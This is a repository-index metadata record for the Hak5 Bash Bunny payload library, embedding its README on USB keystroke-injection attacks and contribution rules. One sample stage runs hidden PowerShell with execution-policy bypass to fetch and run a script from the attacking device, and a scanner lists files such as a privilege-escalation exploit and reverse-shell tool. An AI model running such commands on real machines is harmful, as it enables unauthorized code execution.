{"id":13510640,"url":"https://github.com/hak5/bashbunny-payloads","last_synced_at":"2026-01-17T01:26:04.399Z","repository":{"id":18204454,"uuid":"78046086","full_name":"hak5/bashbunny-payloads","owner":"hak5","description":"The Official Bash Bunny Payload Repository","archived":false,"fork":false,"pushed_at":"2025-12-03T23:02:29.000Z","size":69612,"stargazers_count":2842,"open_issues_count":106,"forks_count":1487,"subscribers_count":347,"default_branch":"master","last_synced_at":"2025-12-07T05:06:23.487Z","etag":null,"topics":["badusb","bashbunny","duckyscript","hak5","hak5-bashbunny","hid","keystroke-injection","pentesting","security-tools"],"latest_commit_sha":null,"homepage":"https://bashbunny.com","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/hak5.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-01-04T19:27:33.000Z","updated_at":"2025-12-03T23:02:36.000Z","dependencies_parsed_at":"2024-11-01T11:31:11.666Z","dependency_job_id":"68423905-a2bc-41d8-afba-0c74c98d2623","html_url":"https://github.com/hak5/bashbunny-payloads","commit_stats":{"total_commits":571,"total_committers":154,"mean_commits":3.707792207792208,"dds":0.8633975481611209,"last_synced_commit":"cb16ca918d5a37e2412fc418b96e5d6dc1eb8b53"},"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"purl":"pkg:github/hak5/bashbunny-payloads","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hak5%2Fbashbunny-payloads","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hak5%2Fbashbunny-payloads/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hak5%2Fbashbunny-payloads/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hak5%2Fbashbunny-payloads/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/hak5","download_url":"https://codeload.github.com/hak5/bashbunny-payloads/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hak5%2Fbashbunny-payloads/sbom","scorecard":{"id":453160,"data":{"date":"2025-08-11","repo":{"name":"github.com/hak5/bashbunny-payloads","commit":"5c7d23d39365ec5620fc7e49424c97e86d5c45d5"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":2.7,"checks":[{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":-1,"reason":"No tokens found","details":null,"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":-1,"reason":"no workflows found","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":2,"reason":"binaries present in source code","details":["Warn: binary detected: payloads/library/credentials/BunnyLogger/xinput:1","Warn: binary detected: payloads/library/credentials/BunnyLogger2.0/requirements/nc:1","Warn: binary detected: payloads/library/credentials/BunnyLogger2.0/requirements/xinput:1","Warn: binary detected: payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/pwnkit:1","Warn: binary detected: payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/pwnkit.so:1","Warn: binary detected: payloads/library/execution/mine4me/mine4me/systemIn/systemIO:1","Warn: binary detected: payloads/library/phishing/Captiveportal/captiveportal:1","Warn: binary detected: payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":8,"reason":"2 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: PYSEC-2018-21 / GHSA-hgg3-g7gr-66r7","Warn: Project is vulnerable to: GHSA-j225-cvw7-qrx7"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Info: Possibly incomplete results: error parsing shell code: \u003e must be followed by a word: payloads/library/credentials/BunnyPicker/payload.txt:0","Info: Possibly incomplete results: error parsing shell code: \"elif \u003ccond\u003e\" must be followed by \"then\": payloads/library/credentials/bushingsBlueTurtle/post.sh:0","Info: Possibly incomplete results: error parsing shell code: (( can only be used to open an arithmetic cmd: payloads/library/prank/90sMode/payload.txt:0","Warn: pipCommand not pinned by hash: payloads/library/Incident_Response/MalwareBunny/install/binwalk.sh:12","Warn: pipCommand not pinned by hash: payloads/library/Incident_Response/MalwareBunny/install/dshell.sh:12","Warn: pipCommand not pinned by hash: payloads/library/Incident_Response/MalwareBunny/install/setup.sh:15","Warn: pipCommand not pinned by hash: payloads/library/Incident_Response/MalwareBunny/install/ssdeep.sh:23","Warn: pipCommand not pinned by hash: payloads/library/Incident_Response/MalwareBunny/install/viper.sh:17","Warn: pipCommand not pinned by hash: payloads/library/Incident_Response/MalwareBunny/install/yara.sh:23","Warn: pipCommand not pinned by hash: payloads/library/recon/rdp_checker/install.sh:23","Info:   0 out of   7 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}}]},"last_synced_at":"2025-08-19T08:44:00.411Z","repository_id":18204454,"created_at":"2025-08-19T08:44:00.412Z","updated_at":"2025-08-19T08:44:00.412Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28491478,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-17T00:50:05.742Z","status":"ssl_error","status_checked_at":"2026-01-17T00:43:11.982Z","response_time":107,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["badusb","bashbunny","duckyscript","hak5","hak5-bashbunny","hid","keystroke-injection","pentesting","security-tools"],"created_at":"2024-08-01T02:01:48.207Z","updated_at":"2026-01-17T01:26:04.385Z","avatar_url":"https://github.com/hak5.png","language":"PowerShell","readme":"# Payload Library for the [Bash Bunny](https://shop.hak5.org/products/bash-bunny) by [Hak5](https://hak5.org)\n\nThis repository contains payloads and extensions for the Hak5 Bash Bunny. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.\n\n**Payloads here are written in official DuckyScript™ and Bash specifically for the Bash Bunny. Hak5 does NOT guarantee payload functionality.** \u003ca href=\"#legal\"\u003e\u003cb\u003eSee Legal and Disclaimers\u003c/b\u003e\u003c/a\u003e\n\n\u003cdiv align=\"center\"\u003e\n\u003cimg src=\"https://img.shields.io/github/forks/hak5/bashbunny-payloads?style=for-the-badge\"/\u003e\n\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\n\u003cimg src=\"https://img.shields.io/github/stars/hak5/bashbunny-payloads?style=for-the-badge\"/\u003e\n\u003cbr/\u003e\n\u003cimg src=\"https://img.shields.io/github/commit-activity/y/hak5/bashbunny-payloads?style=for-the-badge\"\u003e\n\u003cimg src=\"https://img.shields.io/github/contributors/hak5/bashbunny-payloads?style=for-the-badge\"\u003e\n\u003c/div\u003e\n\u003cbr/\u003e\n\u003cp align=\"center\"\u003e\n\u003ca href=\"https://payloadhub.com\"\u003e\u003cimg src=\"https://cdn.shopify.com/s/files/1/0068/2142/files/payloadhub.png?v=1652474600\"\u003e\u003c/a\u003e\n\u003cbr/\u003e\n\u003ca href=\"https://payloadhub.com/blogs/payloads/tagged/bash-bunny\"\u003eView Featured Bash Bunny Payloads and Leaderboard\u003c/a\u003e\n\u003cbr/\u003e\u003ci\u003eGet your payload in front of thousands. Enter to win over $2,000 in prizes in the \u003ca href=\"https://hak5.org/pages/payload-awards\"\u003eHak5 Payload Awards!\u003c/a\u003e\u003c/i\u003e\n\u003c/p\u003e\n\n\u003cdiv align=\"center\"\u003e\n\u003ca href=\"https://hak5.org/discord\"\u003e\u003cimg src=\"https://img.shields.io/discord/506629366659153951?label=Hak5%20Discord\u0026style=for-the-badge\"\u003e\u003c/a\u003e\n\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\n\u003ca href=\"https://youtube.com/hak5\"\u003e\u003cimg src=\"https://img.shields.io/youtube/channel/views/UC3s0BtrBJpwNDaflRSoiieQ?label=YouTube%20Views\u0026style=for-the-badge\"/\u003e\u003c/a\u003e\n\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\n\u003ca href=\"https://youtube.com/hak5\"\u003e\u003cimg src=\"https://img.shields.io/youtube/channel/subscribers/UC3s0BtrBJpwNDaflRSoiieQ?style=for-the-badge\"/\u003e\u003c/a\u003e\n\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\n\u003ca href=\"https://twitter.com/hak5\"\u003e\u003cimg src=\"https://img.shields.io/badge/follow-%40hak5-1DA1F2?logo=twitter\u0026style=for-the-badge\"/\u003e\u003c/a\u003e\n\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\n\u003ca href=\"https://instagram.com/hak5gear\"\u003e\u003cimg src=\"https://img.shields.io/badge/Instagram-E4405F?style=for-the-badge\u0026logo=instagram\u0026logoColor=white\"/\u003e\u003c/a\u003e\n\u003cbr/\u003e\u003cbr/\u003e\n\n\u003c/div\u003e\n\n\n# Table of contents\n\u003cdetails open\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"#about-the-bash-bunny\"\u003eAbout the Bash Bunny\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"#build-your-payloads-with-payloadstudio\"\u003ePayloadStudio (Editor + Compiler)\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cb\u003e\u003ca href=\"#contributing\"\u003eContributing Payloads\u003c/a\u003e\u003c/b\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"#legal\"\u003e\u003cb\u003eLegal and Disclaimers\u003c/b\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e \n\u003c/details\u003e\n\n\n## Shop\n- [Bash Bunny Mark II](https://shop.hak5.org/products/bash-bunny \"Purchase the Bash Bunny\")\n- [PayloadStudio Pro](https://hak5.org/products/payload-studio-pro \"Purchase PayloadStudio Pro\")\n- [Shop All Hak5 Tools](https://shop.hak5.org \"Shop All Hak5 Tools\")\n## Getting Started\n- [Build Payloads with PayloadStudio](#build-your-payloads-with-payloadstudio) | [Getting STARTED](https://docs.hak5.org/bash-bunny/beginner-guides/ \"QUICK START GUIDE\") | [Your First Payload](https://docs.hak5.org/bash-bunny/writing-payloads/payload-development-basics)\n## Documentation / Learn More\n-   [Documentation](https://docs.hak5.org/bash-bunny/ \"Documentation\") \n\n## Community\n*Got Questions? Need some help? Reach out:*\n-  [Discord](https://hak5.org/discord/ \"Discord\") | [Forums](https://forums.hak5.org/forum/92-bash-bunny/ \"Forums\")\n\n\n## Additional Links\n\u003cb\u003e Follow the creators \u003c/b\u003e\u003cbr/\u003e\n\u003cp\u003e\n\t\u003cb\u003eKorben's Socials\u003c/b\u003e\u003cbr/\u003e\t\n\t\u003ca href=\"https://twitter.com/notkorben\"\u003e\u003cimg src=\"https://img.shields.io/twitter/follow/notkorben?style=social\"/\u003e\u003c/a\u003e  \n\t\u003ca href=\"https://instagram.com/hak5korben\"\u003e\u003cimg src=\"https://img.shields.io/badge/Instagram-Follow%20@hak5korben-E1306C\"/\u003e\u003c/a\u003e\n\u003cbr/\u003e\n\t\u003cb\u003eDarren's Socials\u003c/b\u003e\u003cbr/\u003e\n\t\u003ca href=\"https://twitter.com/hak5darren\"\u003e\u003cimg src=\"https://img.shields.io/twitter/follow/hak5darren?style=social\"/\u003e\u003c/a\u003e  \n\t\u003ca href=\"https://instagram.com/hak5darren\"\u003e\u003cimg src=\"https://img.shields.io/badge/Instagram-Follow%20@hak5darren-E1306C\"/\u003e\u003c/a\u003e\n\u003c/p\u003e\n\n\u003cbr/\u003e\n\u003ch1\u003e\u003ca href=\"https://shop.hak5.org/products/bash-bunny\"\u003eAbout the Bash Bunny\u003c/a\u003e\u003c/h1\u003e\n\nLinux machine in a USB. By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits. \n\n\n\u003cb\u003e\u003cdiv align=\"center\"\u003e\n\t\u003cbr/\u003e\n\u003cbr/\u003e\u003cbr/\u003e\n\u003c/div\u003e\u003c/b\u003e\n\n\u003cp align=\"center\"\u003e\n  \u003ca href=\"https://www.youtube.com/watch?v=-UmvZdDxCiI\"\u003e\n    \u003cimg src=\"https://downloads.hak5.org/assets/images/productphotos/bash_bunny_mk2.png\" width=\"500\"/\u003e\n  \u003c/a\u003e\n  \u003cbr/\u003e\n\u003c/p\u003e\n\n\n\u003cp align=\"center\"\u003e\n    \u003cimg src=\"https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon3_160x160.png?v=1624506236\" alt=\"image\"\u003e\n\u003c/p\u003e\n\n## \u003cdiv align=\"center\"\u003eADVANCED ATTACKS \u003c/div\u003e\n\nFor the sake of convenience, computers trust a number of devices. Flash drives, Ethernet adapters, serial devices and keyboards to name a few. These have become mainstays of modern computing. Each has their own unique attack vectors. When combined? The possibilities are limitless. The Bash Bunny is all of these things, alone – or in combination – and more!\n\n\u003cp align=\"center\"\u003e\n    \u003cimg src=\"https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon2_160x160.png?v=1624506369\" alt=\"image\"\u003e\n\u003c/p\u003e\n\n## \u003cdiv align=\"center\"\u003eSIMPLE PAYLOADS \u003c/div\u003e\n\nEach attack, or payload, is written in a simple Ducky Script™ language consisting of text files. This repository is home to a growing library of community developed payloads. Staying up to date with all of the latest attacks is just a matter of downloading files from git. Then loading ’em onto the Bash Bunny just as you would any ordinary flash drive.\n\n\u003cp align=\"center\"\u003e\n    \u003cimg src=\"https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon1_160x160.png?v=1624506437\" alt=\"image\"\u003e\n\u003c/p\u003e\n\n## \u003cdiv align=\"center\"\u003eSIMPLE POWERFUL HARDWARE \u003c/div\u003e\n\nIt's a full featured Linux box that'll run your favorite tools even faster now thanks to the optimized quad-core CPU, desktop-class SSD and doubled RAM. Choose and monitor payloads with the selection switch and RGB LED. Access an unlocked root terminal via dedicated Serial console. Exfiltrate gigs of loot via MicroSD. Even remotely trigger or geofence payloads via Bluetooth.\n\n\n\u003ch1\u003e\u003ca href=\"https://payloadstudio.hak5.org\"\u003eBuild your payloads with PayloadStudio\u003c/a\u003e\u003c/h1\u003e\n\u003cp align=\"center\"\u003e\nTake your DuckyScript™ payloads to the next level with this full-featured,\u003cb\u003e web-based (entirely client side) \u003c/b\u003e development environment.\n\u003cbr/\u003e\n\u003ca href=\"https://payloadstudio.hak5.org\"\u003e\u003cimg width=\"500px\" src=\"https://cdn.shopify.com/s/files/1/0068/2142/products/payload-studio-icon_2000x.png\"\u003e\u003c/a\u003e\n\u003cbr/\u003e\n\u003ci\u003ePayload studio features all of the conveniences of a modern IDE, right from your browser. From syntax highlighting and auto-completion to live error-checking and repo synchronization - building payloads for Hak5 hotplug tools has never been easier!\n\u003cbr/\u003e\u003cbr/\u003e\nSupports your favorite Hak5 gear - USB Rubber Ducky, Bash Bunny, Key Croc, Shark Jack, Packet Squirrel \u0026 LAN Turtle!\n\u003cbr/\u003e\u003cbr/\u003e\u003c/i\u003e\u003cbr/\u003e\n\u003ca href=\"https://hak5.org/products/payload-studio-pro\"\u003eBecome a PayloadStudio Pro\u003c/a\u003e and \u003cb\u003e Unleash your hacking creativity! \u003c/b\u003e\n\u003cbr/\u003e\nOR\n\u003cbr/\u003e\n\u003ca href=\"https://payloadstudio.hak5.org/community/\"\u003e Try Community Edition FREE\u003c/a\u003e \n\u003cbr/\u003e\u003cbr/\u003e\n\u003cimg src=\"https://cdn.shopify.com/s/files/1/0068/2142/files/themes1_1_600x.gif?v=1659642557\"\u003e\n\u003cbr/\u003e\n\u003ci\u003e Payload Studio Themes Preview GIF \u003c/i\u003e\n\u003cbr/\u003e\u003cbr/\u003e\n\u003cimg src=\"https://cdn.shopify.com/s/files/1/0068/2142/files/AUTOCOMPLETE3_600x.gif?v=1659640513\"\u003e\n\u003cbr/\u003e\n\u003ci\u003e Payload Studio Autocomplete Preview GIF \u003c/i\u003e\n\u003c/p\u003e\n\n\n## Disclaimer\nGenerally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.\n\n\u003ch1\u003e\u003ca href='https://payloadhub.com'\u003eContributing\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp align=\"center\"\u003e\n\u003ca href=\"https://payloadhub.com\"\u003e\u003cimg src=\"https://cdn.shopify.com/s/files/1/0068/2142/files/payloadhub.png?v=1652474600\"\u003e\u003c/a\u003e\n\u003cbr/\u003e\n\u003ca href=\"https://payloadhub.com\"\u003eView Featured Payloads and Leaderboard \u003c/a\u003e\n\u003c/p\u003e\n\n# Please adhere to the following best practices and style guides when submitting a payload.\n\nOnce you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.\n\nPlease include all resources required for the payload to run. If needed, provide a README.md in the root of your payload's directory to explain things such as intended use, required configurations, or anything that will not easily fit in the comments of the payload.txt itself. Please make sure that your payload is tested, and free of errors. If your payload contains (or is based off of) the work of other's please make sure to cite their work giving proper credit. \n\n\n### Purely Destructive payloads will not be accepted. No, it's not \"just a prank\".\nSubject to change. Please ensure any submissions meet the [latest version](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md) of these standards before submitting a Pull Request.\n\n\n\n## Naming Conventions\nPlease give your payload a unique, descriptive and appropriate name. Do not use spaces in payload, directory or file names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.\n\n## Staged Payloads\n\"Staged payloads\" are payloads that **download** code from some resource external to the payload.txt. \n\nWhile staging code used in payloads is often useful and appropriate, using this (or another) github repository as the means of deploying those stages is not. This repository is **not a CDN for deployment on target systems**. \n\nStaged code should be copied to and hosted on an appropriate server for doing so **by the end user** - Github and this repository are simply resources for sharing code among developers and users.\nSee: [GitHub acceptable use policies](https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies#5-site-access-and-safety)\n\nAdditionally, any source code that is intended to be staged **(by the end user on the appropriate infrastructure)** should be included in any payload submissions either in the comments of the payload itself or as a seperate file. **Links to staged code are unacceptable**; not only for the reasons listed above but also for version control and user safety reasons. Arbitrary code hidden behind some pre-defined external resource via URL in a payload could be replaced at any point in the future unbeknownst to the user -- potentially turning a harmless payload into something dangerous.\n\n### Including URLs\nURLs used for retrieving staged code should refer exclusively to **example.com** using a bash variable in any payload submissions [see Payload Configuration section below](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md#payload-configuration). \n\n### Staged Example\n\n**Example scenario: your payload downloads a script and the executes it on a target machine.**\n- Include the script in the directory with your payload\n- Provide instructions for the user to move the script to the appropriate hosting service.\n- Provide a bash variable with the placeholder example.com for the user to easily configure once they have hosted the script\n\n[Simple Example of this style of payload](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/exfiltration/Printer-Recon)\n\n## Payload Configuration\nBe sure to take the following into careful consideration to ensure your payload is easily tested, used and maintained.\nIn many cases, payloads will require some level of configuration **by the end payload user**. \n\n- Abstract configuration(s) for ease of use. Use bash assignment variables where possible. \n- Remember to use PLACEHOLDERS for configurable portions of your payload - do not share your personal URLs, API keys, Passphrases, etc...\n- URLs to staged payloads SHOULD NOT BE INCLUDED. URLs should be replaced by example.com. Provide instructions on how to specific resources should be hosted on the appropriate infrastructure.\n- Make note of both REQUIRED and OPTIONAL configuration(s) in your payload using bash comments at the top of your payload or \"inline\" where applicable.\n\n```\nExample: \n\tBEGINNING OF PAYLOAD \n\t... Payload Documentation... \n\n\t# CONFIGURATION\n\t# REQUIRED - Provide URL used for Example\n\tMY_TARGET_URL=\"example.com\"\n\n\t#  OPTIONAL - How long until payload starts; default 5s\n\tBOOT_DELAY=\"5000\"\n\n\tQUACK DELAY $BOOT_DELAY\n\t...\n\tQUACK STRING $MY_TARGET_URL\n\t...\n```\n\n## Payload Documentation \nPayloads should begin with `#` bash comments specifying the title of the payload, the author, the target, and a brief description.\n\n```\nExample:\n\tBEGINNING OF PAYLOAD\n\n\t# Title: Example Payload\n\t# Author: Korben Dallas\n\t# Description: Opens hidden powershell and\n\t# Target: Windows 10\n\t# Props: Hak5, Darren Kitchen, Korben\n\t# Version: 1.0\n\t# Category: General\n```\n\n\n### Binaries\nBinaries may not be accepted in this repository. If a binary is used in conjunction with the payload, please document where it or its source may be obtained.\n\n   \n### Configuration Options\nConfigurable options should be specified in variables at the top of the payload.txt file\n\n    # Options\n    RESPONDER_OPTIONS=\"-w -r -d -P\"\n    LOOTDIR=/root/udisk/loot/quickcreds\n\n### LED\nThe payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or ATTACKMODE.\n\n    # Initialization\n    LED SETUP\n    GET SWITCH_POSITION\n    GET HOST_IP\n    \n    # Attack\n    LED ATTACK\n    ATTACKMODE HID ECM_ETHERNET\n\n### Stages and States\nStages should be documented with comments\n\n    # Keystroke Injection Stage\n    # Runs hidden powershell which executes \\\\172.16.64.1\\s\\s.ps1 when available\n    GET HOST_IP\n    LED STAGE1\n    ATTACKMODE HID\n    RUN WIN \"powershell -WindowStyle Hidden -Exec Bypass \\\"while (\\$true) { If (Test-Connection $HOST_IP -count 1) { \\\\\\\\$HOST_IP\\\\s\\\\s.ps1; exit } }\\\"\"\n\nCommon payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states.\n\n\u003ch1\u003e\u003ca href=\"https://hak5.org/pages/policy\"\u003eLegal\u003c/a\u003e\u003c/h1\u003e\n\nPayloads from this repository are provided for educational purposes only.  Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.\n\nBash Bunny and DuckyScript are the trademarks of Hak5 LLC. Copyright © 2010 Hak5 LLC. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means without prior written permission from the copyright owner.\nBash Bunny and DuckyScript are subject to the Hak5 license agreement (https://hak5.org/license)\nDuckyScript is the intellectual property of Hak5 LLC for the sole benefit of Hak5 LLC and its licensees. To inquire about obtaining a license to use this material in your own project, contact us. Please report counterfeits and brand abuse to legal@hak5.org.\nThis material is for education, authorized auditing and analysis purposes where permitted subject to local and international laws. Users are solely responsible for compliance. Hak5 LLC claims no responsibility for unauthorized or unlawful use.\nHak5 LLC products and technology are only available to BIS recognized license exception ENC favorable treatment countries pursuant to US 15 CFR Supplement No 3 to Part 740.\n\nSee also: \n\n[Hak5 Software License Agreement](https://shop.hak5.org/pages/software-license-agreement)\n\t\n[Terms of Service](https://shop.hak5.org/pages/terms-of-service)\n\n# Disclaimer\n\u003ch3\u003e\u003cb\u003eAs with any script, you are advised to proceed with caution.\u003c/h3\u003e\u003c/b\u003e\n\u003ch3\u003e\u003cb\u003eGenerally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness.\u003c/h3\u003e\u003c/b\u003e\n","funding_links":[],"categories":["PowerShell","\u003ca id=\"1233584261c0cd5224b6e90a98cc9a94\"\u003e\u003c/a\u003e渗透\u0026\u0026offensive\u0026\u0026渗透框架\u0026\u0026后渗透框架","\u003ca id=\"783f861b9f822127dba99acb55687cbb\"\u003e\u003c/a\u003e工具","security-tools"],"sub_categories":["\u003ca id=\"80301821d0f5d8ec2dd3754ebb1b4b10\"\u003e\u003c/a\u003ePayload\u0026\u0026远控\u0026\u0026RAT","\u003ca id=\"6602e118e0245c83b13ff0db872c3723\"\u003e\u003c/a\u003e未分类-payload"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhak5%2Fbashbunny-payloads","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhak5%2Fbashbunny-payloads","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhak5%2Fbashbunny-payloads/lists"}